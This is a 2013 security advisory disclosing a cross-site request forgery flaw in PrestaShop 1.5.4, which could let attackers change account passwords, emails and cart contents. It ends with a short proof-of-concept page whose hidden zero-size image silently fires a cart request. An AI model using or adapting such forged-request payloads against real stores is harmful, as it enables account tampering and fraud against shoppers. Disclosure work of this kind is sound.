View online: http://demo-store.prestashop.com/en/

  * Advisory ID: PRESTASHOP
  * Version: 1.5.4
  * Date: 2013-July-11
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Request Forgery

-------- DESCRIPTION  
---------------------------------------------------------


With this vulnerability, account passwords and mail adresses could be modified and also products could be added or removed remotely from the shopping cart.


-------- SOLUTION  
------------------------------------------------------------

There is no solution for this vulnerability at the moment.

-------- REPORTED BY  
---------------------------------------------------------

  * EntPro Cyber Security Research Group (www.entpro.com.tr)
    (Eyüp ÇELÝK, Ýsmail SAYGILI, Gökay BEKÞEN, Ünlü AÐYOL, Yunus Emre KARABULUT)


-------- EXPLOIT CODE  
---------------------------------------------------------


<html>
<head>
<body>
<img src="http://localhost/language/cart?add=&id_product=[Product ID]" width=0 height=0>
</body>
</head>
</html>